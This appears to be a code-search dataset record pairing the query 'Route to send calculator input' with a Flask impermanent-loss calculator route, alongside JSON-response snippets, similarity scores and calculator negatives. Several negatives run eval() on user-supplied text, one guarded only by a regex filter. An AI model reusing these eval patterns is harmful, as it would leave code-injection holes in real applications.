self.data.to_json()", "def returns_json(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n try:\n r = f(*args, **kwargs)\n except HTTPException as e:\n # monkey-patch the headers / body to be json\n headers = e.get_headers()\n for header in headers:\n if 'Content-Type' in header:\n headers.remove(header)\n headers.append(('Content-Type', 'application/json'))\n e.get_headers = lambda x: headers\n e.get_body = lambda x: json.dumps({\"message\": e.description})\n raise e\n if isinstance(r, tuple):\n return Response(r[0], status=r[1], content_type='application/json')\n else:\n return Response(r, content_type='application/json')\n return decorated_function", "def format_service_api_response(func):\n @wraps(func)\n def get_response(*args, **kwargs):\n try:\n res = func(*args, **kwargs)\n return {\"status\": \"200\", \"result\": res}\n except:\n return {\"status\": \"404\", \"result\": \"\"}\n return get_response", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(self.get_data(**context), **response_kwargs)", "def jresp() -> Dict:\n def _method(response):\n return json_of_response(response)\n return _method", "def get_json_string(self, **kwargs):\n ...", "def to_api_data(self):\n raise NotImplementedError()", "def json(self, **kwargs):\n\t\ttry:\n\t\t\treturn self.response.json(**kwargs)\n\t\texcept ValueError:\n\t\t\t# No valid JSON encoding\n\t\t\treturn None", "def acceptjson(vcf_object):\n\n def in_acceptjson(func):\n @wraps(func)\n def return_json(*args, **kwargs):\n g.payload_json = retrieve_json(\n request.base_url,\n int(request.args.get('page', 1)),\n int(request.args.get('limit', 20)),\n vcf_object\n )\n\n if request.headers.get('Accept', '*/*') in ['*/*', 'application/json']:\n return Response(response=json.dumps(g.payload_json), status=200, mimetype=\"application/json\")\n\n return func()\n\n return return_json\n\n return in_acceptjson", "def json_response(f):\n \n def wrapped(*args, **kwargs):\n result = f(*args, **kwargs)\n \n response = HttpResponse(json.dumps(result))\n \n if type(result) == dict and \"error\" in result:\n response.status_code = 500\n \n \n return response", "def __call__(self, value, system): \n request = system.get('request') \n if request is not None: \n if not hasattr(request, 'response_content_type'): \n request.response_content_type = 'application/json'\n request.response.headerlist.append(('Access-Control-Allow-Origin', '*'))\n return customjson.dumps(value)", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(\n self.get_data(context),\n **response_kwargs\n )", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(\n self.get_data(context),\n **response_kwargs\n )", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(\n self.get_data(context),\n **response_kwargs\n )", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(\n self.get_data(context),\n **response_kwargs\n )", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(\n self.get_data(context),\n **response_kwargs\n )", "def json_response(func):\n async def wrapped(*args, **kwargs):\n content, status = await func(*args, **kwargs)\n return web.json_response(data=content, status=status)\n return wrapped", "def wrapper(resource, request, ** kwargs):\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)", "def json_api():\n if 'category' in request.args:\n sqlsession = SQLSESSION()\n category = sqlsession.query(Category)\\\n .filter_by(name=request.args['category']).first()\n items = sqlsession.query(Item).filter_by(category_id=category.id)\\\n .all()\n return json.dumps({'category_id': category.id,\n 'category_name': category.name,\n 'items': [item.serialize() for item in items]})\n elif 'item' in request.args:\n sqlsession = SQLSESSION()\n items = sqlsession.query(Item).filter_by(name=request.args['item'])\\\n .all()\n return json.dumps([item.serialize() for item in items])\n sqlsession = SQLSESSION()\n categories = sqlsession.query(Category).all()\n items = sqlsession.query(Item).all()\n return json.dumps(\n {'categories': [cat.serialize() for cat in categories],\n 'items': [item.serialize() for item in items]})", "def test_data_to_json(self):\n\n from rubber.instanceutils import data_to_json\n\n # with a dict\n data = {'foo':'bar'}\n json_data = json.dumps(data)\n self.assertEquals(json_data, data_to_json(data))\n\n # with a string\n json_data = json.dumps(data)\n self.assertEquals(json_data, data_to_json(json_data))\n\n # try a class that implements to_indexed_json\n class Foo(object):\n def to_indexed_json(self):\n return json_data\n self.assertEquals(json_data, data_to_json(Foo()))\n\n # try a django model\n try:\n from django.db import models\n class TestModel(models.Model):\n foo = models.CharField(max_length=3)\n bar = TestModel(foo='bar')\n self.assertEquals(json_data, data_to_json(bar))\n except ImportError:\n pass", "def safe_json(self, context):\n serialize_context = dict()\n for key, obj in context.items():\n if isinstance(obj.__class__, ModelBase):\n if hasattr(obj, 'serialize') and callable(getattr(obj, 'serialize')):\n serialize_context[key] = obj.serialize()\n else:\n serialize_context[key] = model_to_dict(obj)\n elif isinstance(obj, QuerySet):\n serialize_context[key] = [o.serialize() for o in obj if hasattr(o, 'serialize')]\n if len(serialize_context[key]) != len(obj):\n serialize_context[key] = [model_to_dict(o) for o in obj]\n elif key == 'extra':\n serialize_context[key] = obj\n # elif key == 'view':\n # continue\n # else:\n # serialize_context[key] = obj\n return dict(success=True, data=serialize_context)", "def output_json(data, code, headers=None):\n #data[\"timestamp\"] = datetime.now()\n return jsonify(data)", "def json_response(func):\n\n async def wrapped(*args, **kwargs):\n content, status = await func(*args, **kwargs)\n return web.json_response(data=content, status=status)\n\n return wrapped", "def json_response( json_object ):\n return HttpResponse( json.dumps(json_object) )", "def json_post(method):\n def wrap(*args, **kwargs):\n # idx is the position of the data\n idx = 0\n if not isinstance(args[0], webob.Request):\n idx = 1\n\n json_data = json.loads(args[idx].body)\n kwargs['post_data'] = json_data\n\n #print \"JP:\", repr(args), repr(kwargs)\n\n return method(*args, **kwargs)\n \n return json_return(wrap)", "def api_documentation(api: str, summary: str, in_model: BaseModel,\n out_model: BaseModel, out_description: str) -> Callable:\n for model, name in ((in_model, 'Input'), (out_model, 'Output')):\n doc.Object(\n make_dataclass(\n f'Api{api[1:].title()}{name}',\n [(key, val.type_, val.type_)\n for key, val in model.__dict__['__fields__'].items()]))\n im_returns = doc.JsonBody({\n key: val.type_\n for key, val in in_model.__dict__['__fields__'].items()\n })\n\n om_returns = {\n key: val.type_\n for key, val in out_model.__dict__['__fields__'].items()\n }\n\n def decorator(func):\n @doc.summary(summary)\n @doc.response(412,\n 'Error: Precondition Failed',\n description='The passed request-parameters are invalid')\n @doc.response(500,\n 'Error: Server-Error occured',\n description='An internal error occured')\n @doc.consumes(im_returns,\n content_type='application/json',\n location='body')\n @doc.produces(om_returns,\n content_type='application/json',\n description=out_description)\n @wraps(func)\n async def function_wrapper(request, *args, **kwargs):\n return await func(request=request, *args, **kwargs)\n\n return function_wrapper\n\n return decorator", "def render_to_response(self, context, **response_kwargs):\n return JsonResponse(context)", "def json_response(self, request, *args, **kwargs):\n\n return HttpResponse(self.construct_json(),\n content_type='application/json',\n mimetype='application/json', status=self.status)", "def get_json(response):\n\n json_field_or_function = getattr(response, 'json', None)\n if callable(json_field_or_function):\n return response.json()\n else:\n return json.loads(response.content)", "def convert_to_json(data, name, is_model=False):\n if is_model:\n data = json.dumps(data, indent=4, cls=ModelListEncoder)\n else:\n data = list({item for sublist in data for item in sublist})\n data = list(filter(None, data))\n data = json.dumps(data, indent=4)\n\n with open(PATH + name, 'w', encoding=\"utf-8\") as file:\n file.write(data)", "def default(self, obj):\n\n if hasattr(obj, 'to_dict'):\n return getattr(obj, 'to_dict')()\n\n if isinstance(obj, query.Query):\n return list(obj)\n\n elif isinstance(obj, datetime.datetime):\n return obj.isoformat()\n\n elif isinstance(obj, time.struct_time):\n return list(obj)\n\n elif isinstance(obj, users.User):\n output = {}\n methods = ['nickname', 'email', 'auth_domain']\n for method in methods:\n output[method] = getattr(obj, method)()\n return output\n\n elif isinstance(obj, model.Key):\n return obj.get()\n\n return simplejson.JSONEncoder.default(self, obj)", "def default(self, o):\n if (ClientData.__name__ == o.__class__.__name__):\n return o.to_dict()\n else:\n return json.JSONEncoder.default(self, o)", "def render_json(self, obj):\n self.response.content_type = \"application/json\"\n self.response.out.write(json.encode(obj))", "def to_response_data(self) -> typing.Any:\n return json.dumps(self.value, cls=ToJsonEncoder)", "def mocked_json(return_data=None):\n if return_data is None:\n return_data = {}\n\n def json(*args, **kwargs): # pylint:disable=unused-argument, missing-docstring\n return return_data\n return json", "def opt_engine_rest_api():\n request_json = request.get_json()\n return process_request(request_json)", "def xjsonify(obj):\n\n return Response(json.dumps(obj), mimetype='application/json')", "def json_serialize(self):\n raise NotImplementedError('json_serialize must be overriden')", "def __call__(self, rv):\n if isinstance(rv, ResponseBase):\n return rv\n data, status, headers = unpack(rv)\n resp = flask.make_response(self._encoder(data, **self.json_settings),\n status, {'Content-Type': self.content_type})\n resp.headers.extend(headers)\n return resp", "def get():\n #Return the corresponding value\n return json_back()", "def requests_response_to_model(response_transformer):\n def response_transform_decorator(original_func):\n \"\"\"\n Creates wrapper around a function that returns response\n \"\"\"\n def response_transformer_wrapper(*args, **kwargs):\n \"\"\"\n Log errors and apply transformation in response_handler_func\n \"\"\"\n try:\n response = original_func(*args, **kwargs)\n response.raise_for_status()\n\n except requests.exceptions.HTTPError:\n help_string = ('Please consult the Coursera Data '\n 'Exports Guide for further assistance: '\n 'https://partner.coursera.help/hc/en-us/articles/360021121132.') # noqa\n\n if (response.status_code == 403):\n help_string = ('Please authorize this application '\n 'by running:\\n'\n '\\t$ courseraoauth2client config authorize --app manage_research_exports\\n' # noqa\n 'See https://github.com/coursera/courseraoauth2client ' # noqa\n 'for more information on authorization.\\n'\n 'For further assistance, consult the '\n 'Coursera Data Exports Guide '\n 'https://partner.coursera.help/hc/en-us/articles/360021121132.') # noqa\n\n logging.error(\n 'Request to {url} with body:\\n\\t{body}\\nreceived response'\n ':\\n\\t{text}\\n'\n '{help_string}\\n'\n .format(url=response.url,\n text=response.text,\n body=(response.request and response.request.body),\n help_string=help_string))\n raise\n\n return response_transformer(response)\n return response_transformer_wrapper\n return response_transform_decorator", "def normalize_response(func):\n def wrapper(*args, **kwargs):\n try:\n ret_val = func(*args, **kwargs)\n return {\"code\": 0, \"msg\": \"\", \"data\": ret_val}\n except Exception as err:\n logger.exception(\"func name: %s, error: %s\" % (func.__name__, err))\n result = {\"code\": -20002, \"msg\": str(err)}\n return result\n return wrapper", "def _trait_to_json(x, self):\n return x", "def get_response_model_ctor(self):\n return self._response_model_ctor" ]
[ "0.6303589", "0.6233411", "0.6158551", "0.61566204", "0.61502767", "0.6142237", "0.6134618", "0.60121006", "0.60005003", "0.5990344", "0.59364825", "0.59224707", "0.59192204", "0.5905445", "0.58905154", "0.58634555", "0.5848181", "0.5831524", "0.58291614", "0.58150035", "0.5784024", "0.57303464", "0.5703129", "0.5703129", "0.5699096", "0.5698261", "0.566989", "0.56070447", "0.55946916", "0.5593708", "0.5575277", "0.55716133", "0.5556596", "0.5547955", "0.554137", "0.5535954", "0.548352", "0.54771614", "0.5475626", "0.54659075", "0.5451081", "0.5448285", "0.54318607", "0.54299855", "0.5423321", "0.542127", "0.5406202", "0.5403265", "0.53871393", "0.53737146", "0.5346496", "0.53372973", "0.5319322", "0.52877176", "0.5280581", "0.5269348", "0.52587616", "0.5242363", "0.52414584", "0.5237407", "0.52359766", "0.5231135", "0.5230241", "0.5220532", "0.5212685", "0.5212264", "0.5207956", "0.5196498", "0.5196498", "0.5196498", "0.5196498", "0.5196498", "0.5192555", "0.51799154", "0.5174056", "0.51602787", "0.5158697", "0.5140324", "0.5134635", "0.5129241", "0.5128415", "0.5123251", "0.5117758", "0.511543", "0.51142126", "0.51108295", "0.5108938", "0.5107516", "0.51025313", "0.50885165", "0.5081132", "0.5077513", "0.5077225", "0.5066023", "0.5057553", "0.5056245", "0.5052294", "0.50469357", "0.50423723", "0.50375116" ]
0.6607163
0
Route to send calculator input
def operation_result(): input1 = request.form['Input1'] input2 = request.form['Input2'] input3 = request.form['Input3'] input4 = request.form['Input4'] input5 = request.form['Input5'] input6 = request.form['Input6'] try: token_price_a_initial = float(input1) token_price_b_initial = float(input2) token_price_a_future = float(input3) token_price_b_future = float(input4) token_a_pool_weight = float(input5) token_b_pool_weight = float(input6) if token_a_pool_weight + token_b_pool_weight == 1: r1 = token_price_a_future/token_price_a_initial r2 = token_price_b_future/token_price_b_initial impermanent_loss = ((r1**(token_a_pool_weight))*(r2**(token_b_pool_weight)) /(r1*token_a_pool_weight + r2*token_b_pool_weight) - 1)*-100 return render_template( 'calculator.html', result=impermanent_loss, calculation_success=True ) except: return render_template( 'calculator.html', calculation_success=False )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculator(operation): \n \n operation = MATH[operation]\n a = int(request.args.get(\"a\"))\n b = int(request.args.get(\"b\"))\n total = operation(a, b)\n\n return f\"<h1>TOTAL: {total}</h1>\"", "def all_arithmetic_operators(request: Any) -> Any:\n return request.param", "def all_arithmetic_operators(request: Any) -> Any:\n return request.param", "def all_arithmetic_operators(request):\n return request.param", "def create_calculation():\n if request.method == 'POST':\n ip = request.remote_addr\n text = request.form['answer']\n user = find_user(ip)\n is_valid, message = check_valid_expression(text)\n if is_valid:\n answer = eval(text)\n db.create(user, str(message + \"=\" + str(answer)))\n return redirect('/')\n return redirect(url_for('.handle_error', message=message))\n\n return render_template('create_calculation.html', calculation=None)", "def index():\n\n page = \"\"\"\n <h1>Calculator</h1>\n <div>Directions. This app will calculate 2 or more numbers provided in the url string. To use:\n <ol>\n <li>Type in http://localhost:8080/</li>\n <li>Type in the arithmetic operation (add, subract, multiply, divide) followed by /</li>\n <li>Type in numbers. Between each number include a /</li>\n <li>For example, http://localhost:8080/add/5/10/</li>\n </ol></div>\n <h2>Tests:</h2><ul>\n <li><a href=\"http://localhost:8080/add/5/10/15\">Addition</a></li>\n <li><a href=\"http://localhost:8080/subtract/100/50/25\">Subraction</a></li>\n <li><a href=\"http://localhost:8080/multiply/5/10/15\">Multiplication</a></li>\n <li><a href=\"http://localhost:8080/divide/100/50\">Division</a></li>\n \"\"\"\n return page", "def cmd_calc(self, event, command, usercommand):\n try:\n result = str(self.parser.eval(usercommand.arguments))\n response = '*** Calc: {}'.format(escape(result))\n except:\n fail = '*** Could not evaluate expression.'\n\n if self.wolfram:\n try:\n res = self.wolfram.query(usercommand.arguments)\n if len(res.pods) > 1:\n answer = res.pods[1].text\n\n # fix unicode\n answer = answer.encode('unicode-escape')\n answer = answer.replace(b'\\\\\\\\:', b'\\u')\n answer = answer.decode('unicode-escape')\n\n response = '*** W|A: {}'.format(escape(answer))\n else:\n response = fail\n except Exception as ex:\n if 'Computation error' in str(ex):\n response = fail\n else:\n print('exception:', ex)\n response = '*** Sorry, we ran into a problem. Please try again later'\n else:\n response = fail\n\n event['from_to'].msg(response)", "def math(oper):\n a=int(request.args.get('a'))\n b=int(request.args.get('b'))\n result = math_oper[oper](a,b)\n return str(result)", "def cmd_calculation():", "def home(*args):\n home_page = \"\"\"To use this calculator, simply type the desired mathematic operation<br>\n after the http://localhost:8080/ in your browser's address bar.<br>\n Your choices are:<br>\n add/<br>\n subtract/<br>\n multiply/<br>\n divide/<br>\n Follow your mathematic operation in the address with as many operands as you want.<br>\n <br>\n Example: http://localhost:8080/add/5/3/2/6/10 will return a value of 26 to your browser.<br>\"\"\"\n\n return home_page", "def main():\n model = Calculator()", "def calculator(): \n\n #asks for user's input \n user_input = raw_input(\"Type in the math expression and two numbers like + 1 2 : \")\n #splits the user's input into a list\n math_op = user_input.split(\" \")\n\n #pulls the appropriate function based on the user's input\n if math_op[0] == '+':\n print add(int(math_op[1]), int(math_op[2]))\n\n elif math_op[0] == '-':\n print subtract(int(math_op[1]), int(math_op[2]))\n\n elif math_op[0] == '*':\n print multiply(int(math_op[1]), int(math_op[2]))\n\n elif math_op[0] == '/':\n print divide(int(math_op[1]), int(math_op[2]))\n \n elif math_op[0] == \"square\":\n print square(int(math_op[1]))\n\n elif math_op[0] == 'cube':\n print cube(int(math_op[1]))\n\n elif math_op[0] == 'pow':\n print power(int(math_op[1]), int(math_op[2]))\n\n elif math_op[0] == 'mod':\n print mod(int(math_op[1]), int(math_op[2]))\n\n else:\n print \"That is not a valid input. Please try any of the following operator: + - * / square cube pow mod.\"", "def Calc():\n print('Please type a maths expression with 2 intergers or floats and an operator \"+\", \"-\", \"*\" or \"/\"')\n inp = (input())\n for char in inp:\n if char not in '1234567890.-+*/':\n print('Please restart the program and only type valid characters')\n return\n operators = [\"+\", \"-\", \"*\", \"/\"]\n buf = ''\n operand1 = 0.0\n operand2 = 0.0\n for char in inp:\n if char not in operators:\n buf += char\n else:\n operator = char\n operand1 = float(buf)\n buf = ''\n operand2 = float(buf)\n res = 0.0\n if operator == '+':\n res = su(operand1, operand2)\n elif operator == '-':\n res = sub(operand1, operand2)\n elif operator == '*':\n res = mu(operand1, operand2)\n elif operand2==0:\n return \"Can not divide by 0\"\n else:\n res = di(operand1, operand2)\n print(res)\n return res", "def main():\n pycalcApp = QApplication(sys.argv)\n pycalcView = PyCalcUi()\n pycalcView.show()\n model = evaluateExpression\n PyCalcController(model=model, view=pycalcView)\n sys.exit(pycalcApp.exec())", "def get(self):\n ops = self.request.get('ops')\n logging.info('get: ' + ops)\n if ops:\n self.request.body = ops\n self.post()\n self.response.headers['Content-Type'] = 'text/html'", "def test_simple_calculation(self):\n\t\turl = reverse('calculation')\n\t\tdata = {'expression': '2+3*(4+2)'}\n\t\tresponse = self.client.post(url, data, format='json')\n\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n\t\tself.assertEqual(response.data, {'result': 20 })", "def all_math(operator):\n a = int(request.args.get(\"a\"))\n b = int(request.args.get(\"b\"))\n return str(functions[operator](a,b))", "def _present_user_calculator_options_interface(self):\n print(\"\\nwelcome to the calculator\")\n print(\"What would you like to do\")\n print(\"Choose a number:\")\n print(\"1)Solve an equation\")\n print(\"2)Exit\")", "def dispatch_request(self):\n\n text = request.args.get('text')\n model_name = request.args.get('model')\n\n if 'text' in request.form:\n text = request.form['text']\n if 'model' in request.form:\n model_name = request.form['model']\n\n if text is None:\n message = \"The service accepts GET and POST requests containing a mandatory 'text' parameter\"\n raise InvalidAPIUsage(message, status_code=400)\n\n models = app.config['MODELS']\n\n if model_name is None:\n model_name = app.config['DEFAULT_MODEL']\n\n if model_name not in models:\n message = 'Unknown model: %s' % model_name\n raise InvalidAPIUsage(message, status_code=400)\n\n # Compute answer\n answer = None\n\n return jsonify(answer)", "async def _calc(self, ctx, *, m):\r\n m = \"\".join(m)\r\n math_filter = re.findall(\r\n r\"[\\[\\]\\-()*+/0-9=.,% ]|>|<|==|>=|<=|\\||&|~|!=|^|sum\"\r\n + \"|range|random|randint|choice|randrange|True|False|if|and|or|else\"\r\n + \"|is|not|for|in|acos|acosh|asin|asinh|atan|atan2|atanh|ceil\"\r\n + \"|copysign|cos|cosh|degrees|e|erf|erfc|exp|expm1|fabs|factorial\"\r\n + \"|floor|fmod|frexp|fsum|gamma|gcd|hypot|inf|isclose|isfinite\"\r\n + \"|isinf|isnan|ldexp|lgamma|log|log10|log1p|log2|modf|nan|pi\"\r\n + \"|pow|radians|sin|sinh|sqrt|tan|tanh|round\",\r\n m,\r\n )\r\n calculate_stuff = eval(\"\".join(math_filter))\r\n if len(str(calculate_stuff)) > 0:\r\n em = await Embed.create(\r\n ctx,\r\n title=\"CollectorDevTeam Calculator\",\r\n thumbnail=self.thumbnail,\r\n description=\"**Input**\\n`{}`\\n\\n**Result**\\n`{}`\".format(m, calculate_stuff),\r\n )\r\n em.add_field(name=\"Type Math\", value=\"Get Fun\")\r\n await ctx.send(embed=em)", "def add(*args):\r\n\r\n # TODO: Fill sum with the correct value, based on the\r\n # args provided.\r\n num_a = int(args[0])\r\n num_b = int(args[1])\r\n answer = \"\"\"<html>\r\n <head>\r\n <title>WSGI Calculator</title>\r\n </head>\r\n <body>\r\n The answer is: {}\r\n </body>\r\n </html>\"\"\"\r\n\r\n try:\r\n total = num_a + num_b\r\n except:\r\n raise ValueError\r\n return answer.format(total)\r\n #body = \"Your total is: {}\".format(total)\r\n #print(\"Content-type: text/plain\")\r\n #print()\r\n #print(body)\r", "def on_select(self):\n print(\"Please enter a question in one of the following formats:\")\n print(\" 1- op1 operator op2\")\n print(\" 2- operator op\")\n print(\"Where operator can be: +,-,*,/,^,V\")\n print(\" ^ denotes power and V denotes square root\")\n question = input(\"Question: \")\n self.solve(question)", "def index(request):\n form = ConverterForm()\n\n template = loader.get_template(\"number_converter_app/index.html\")\n context = {\"form\": form}\n return HttpResponse(template.render(context, request))", "def instructions():\n\n instructions_text = 'Here is how to use this calculator:<br>'\n instructions_text += 'http://localhost:8080/ => These instructions<br>'\n instructions_text += 'To add: http://localhost:8080/add/23/42 => 65<br>'\n instructions_text += 'To subtract: http://localhost:8080/subtract/23/42 => -19<br>'\n instructions_text += 'To multiply: http://localhost:8080/multiply/3/5 => 15<br>'\n instructions_text += 'To divide: http://localhost:8080/divide/22/11 => 2'\n\n return instructions_text", "def calc():\r\n\r\n op = input(\"Valitse operaatio (+, -, *, /): \")\r\n if op in ('+', '-', '*', '/'):\r\n try:\r\n luku1 = float(input(\"Anna luku 1: \"))\r\n luku2 = float(input(\"Anna luku 2: \"))\r\n except ValueError:\r\n print(\"Ei tämä ole mikään luku\")\r\n\r\n else:\r\n if op == '+':\r\n vastaus = luku1 + luku2\r\n elif op == '-':\r\n vastaus = luku1 - luku2\r\n elif op == '*':\r\n vastaus = luku1 * luku2\r\n elif op == '/':\r\n if luku2 != 0:\r\n vastaus = luku1 / luku2\r\n else:\r\n print(\"Tällä ohjelmalla ei pääse äärettömyyteen\")\r\n return\r\n print(\"Tulos: {}\".format(vastaus))\r\n else:\r\n print(\"operaatiota ei ole olemassa\")", "def equation(operation, firstnum, secondnum):\n if operation == 'plus':\n return firstnum + secondnum\n elif operation == 'minus':\n return firstnum - secondnum\n elif operation == 'multiply':\n return firstnum * secondnum\n elif operation == 'divide':\n if not secondnum == 0:\n return firstnum / secondnum\n raise ZeroDivisionError(\"Unable to divide by 0.\")\n raise ValueError('Invalid operation provided.')", "def perform_operation(operator, num_1, num_2):\n\n if operator == \"*\":\n return num_1 * num_2\n if operator == \"+\":\n return num_1 + num_2\n if operator == \"-\":\n return num_1 - num_2\n if operator == \"/\":\n return num_1 / num_2", "def main():\n print(\"Choose your desired operator:\")\n print(\"1 to calculate hypotenuse \\n\"\n \"2 to add \\n\"\n \"3 to subtract \\n\"\n \"4 to multiply \\n\"\n \"5 to divide\")\n\n user_input = input(\"your choice: \")\n\n # check if input is an int from 1 to 5.\n while not user_input.isnumeric() or int(user_input) > 5 or int(user_input) < 1:\n print(\"\\ninvalid choice\")\n user_input = input(\"your choice: \")\n choice = int(user_input)\n\n a = float(input(\"enter first number: \"))\n b = float(input(\"enter second number: \"))\n\n # switch case using dictionary\n switcher = {\n 1: hypotenuse.calculate_hypotenuse(a, b),\n 2: sum(a, b),\n 3: subtract(a, b),\n 4: multiply(a, b),\n 5: divide(a, b)\n }\n answer = switcher.get(choice, \"invalid\")\n print(\"answer: {0}\".format(round(answer, 2)))", "def basic_calculator():\r\n\r\n num1 = input(\"Enter first number: \") # taking input\r\n\r\n # handling the exception of typecasting the value of 'num1' to float\r\n try:\r\n num1 = float(num1)\r\n except ValueError:\r\n print(\"Error: Input numeric values.\\nTry Again!\")\r\n exit()\r\n\r\n num2 = input(\"Enter second number: \") # taking input\r\n\r\n # handling the exception of typecasting the value of 'num2' to float\r\n try:\r\n num2 = float(num2)\r\n except ValueError:\r\n print(\"Error: Input numeric values.\\nTry Again!\")\r\n exit()\r\n\r\n # Asking user for the operation\r\n print(\"Select the operation:\")\r\n print(\"Type:\")\r\n print(\"1 for Addition\\n2 for Subtraction\\n3 for Multiplication\\n4 for Division\\n5 for Integer Division\\n6 for Power\")\r\n choice = input(\"Enter your choice: \")\r\n\r\n result = 0.0\r\n\r\n # Performing the operation and providing the result\r\n if choice == '1':\r\n result = num1 + num2\r\n elif choice == '2':\r\n result = num1 - num2\r\n elif choice == '3':\r\n result = num1 * num2\r\n elif choice == '4':\r\n result = num1 / num2\r\n elif choice == '5':\r\n result = num1 // num2\r\n elif choice == '6':\r\n result = num1 ** num2\r\n else:\r\n print(\"Wrong Input! Try Again.\")\r\n exit()\r\n\r\n print(f'\\nThe result is: {result}')", "def result(request):\n form = ConverterForm()\n\n template = loader.get_template(\"number_converter_app/result.html\")\n given_number = request.POST.get(\"given_number\")\n\n MyNumber = Number(given_number)\n\n context = {\n \"form\": form,\n \"given_number\": given_number,\n \"result\": MyNumber.result,\n }\n return HttpResponse(template.render(context, request))", "def perform_op(self):\n args = self.display.get_text().split(' ') \n arg1 = args[0]\n arg2 = args[2]\n op = args[1]\n result = ''\n\n if op == '+':\n result = str(int(arg1) + int(arg2))\n elif op == '-':\n result = str(int(arg1) - int(arg2))\n elif op == '*':\n result = str(int(arg1) * int(arg2))\n else:\n result = float(arg1) / float(arg2)\n result = '%.0f' % (result) if round(result) == result \\\n else '%f' % (result)\n\n self.reset(result)", "def math_add():\n a = int(request.args.get(\"a\"))\n b = int(request.args.get(\"b\"))\n return str(add(a, b))", "def route( request, c ):", "def main():\n printfunc(calc(menu()))", "def calculate(first, second, operator):\n result = \"\"\n if operator == \"+\":\n result = int(first) + int(second)\n elif operator == \"-\":\n result = int(first) - int(second)\n elif operator == \"/\":\n result = int(first) / int(second)\n elif operator == \"*\":\n result = int(first) * int(second)\n else:\n print \"Did not recognize: \" + operator\n\n return result", "def input_(self, op):\n value = input(\"Enter your input: \")\n self.set_value(op.address, value, op.type_, op.is_global)", "def hello():\n\n if request.method == 'POST':\n result: ImmutableMultiDict = request.form\n data = dict(result.lists())\n sum_up = sum_upper(data['dane'][0])\n sum_down = sum_lower(data['dane'][0])\n results = {\"Duże znaki\": sum_up, \"Małe znaki\": sum_down}\n\n return render_template(\"result.html\", result=results)", "def calculate(numbers, operator):\n \n if operator == 'add':\n return add(prepare_numbers(numbers))\n elif operator == 'subtract':\n return subtract(prepare_numbers(numbers))\n elif operator == 'multiply':\n return multiply(prepare_numbers(numbers))\n elif operator == 'divide':\n return divide(prepare_numbers(numbers))\n elif operator == 'remainder':\n return remainder(prepare_numbers(numbers))\n elif operator == 'power':\n return power(prepare_numbers(numbers))", "def main():\n #------------------------------------- Functions\n def add(text):\n \"\"\"\n This will add to the display, and be the go to function of most buttons.\n We'll want to add in conditions for what buttons go.\n \"\"\"\n orig = dispb[\"text\"]\n new = orig + text\n ops = [\"+\",\"-\",\"*\",\"/\"]\n # conditions\n # length 21\n if len(new) > 21:\n dispb[\"text\"] = orig\n return 0\n \n # one calc at a time\n if len(orig) > 0:\n if (orig[-1] in ops) & (text in ops):\n dispb[\"text\"] = orig\n return 0\n\n dispb[\"text\"] = new\n return 0\n \n def clear():\n dispb[\"text\"] = \"\"\n return 0\n \n def backspace():\n dispb[\"text\"] = dispb[\"text\"][:len(dispb[\"text\"])-1]\n return 0\n \n def equals():\n try:\n dispb[\"text\"] = str(eval(dispb[\"text\"]))\n except:\n dispb[\"text\"]=\"ERROR, clear display\"\n \n #------------------------------------- UI\n \n # title and start\n calc = tk.Tk()\n calc.title(\"Calculator\")\n # size\n calc.geometry(\"255x235\")\n #calc.columnconfigure(range(3), weight=1, minsize=50)\n #calc.rowconfigure(range(1,4), weight=1, minsize=48)\n \n # Icon\n calc.iconbitmap('Icon.ico')#'Icon.ico')\n \n \n calcarea = tk.Frame(master=calc)\n calcarea.pack(padx=5, pady=10)\n \n # display box\n disp = tk.Frame(\n master = calcarea\n )\n disp.grid(row = 0, column = 0, columnspan = 3)\n dispb = tk.Label(\n master = disp,\n text = '',\n fg = 'black',\n bg = 'white',\n borderwidth = 1,\n relief = 'solid',\n height = 2,\n width = 19\n )\n dispb.pack()\n \n # number buttons\n num1 = tk.Frame(\n master=calcarea\n )\n num1.grid(row = 3, column = 0)\n num1b = tk.Button(\n master = num1,\n text = 1,\n width = 5,\n height = 2,\n command = lambda: add(\"1\")\n ).pack()\n # the pack is what adds it to the UI\n # two \n num2 = tk.Frame(\n master=calcarea\n )\n num2.grid(row = 3, column = 1)\n num2b = tk.Button(\n master = num2,\n text = \"2\",\n width = 5,\n height = 2,\n command = lambda: add(\"2\")\n ).pack()\n \n # three \n num3 = tk.Frame(\n master=calcarea\n )\n num3.grid(row = 3, column = 2)\n num3b = tk.Button(\n master = num3,\n text = \"3\",\n width = 5,\n height = 2,\n command = lambda: add(\"3\")\n ).pack()\n \n # four \n num4 = tk.Frame(\n master=calcarea\n )\n num4.grid(row = 2, column = 0)\n num4b = tk.Button(\n master = num4,\n text = \"4\",\n width = 5,\n height = 2,\n command = lambda: add(\"4\")\n ).pack()\n \n # five \n num5 = tk.Frame(\n master=calcarea\n )\n num5.grid(row = 2, column = 1)\n num5b = tk.Button(\n master = num5,\n text = \"5\",\n width = 5,\n height = 2,\n command = lambda: add(\"5\")\n ).pack()\n \n # six \n num6 = tk.Frame(\n master=calcarea\n )\n num6.grid(row = 2, column = 2)\n num6b = tk.Button(\n master = num6,\n text = \"6\",\n width = 5,\n height = 2,\n command = lambda: add(\"6\")\n 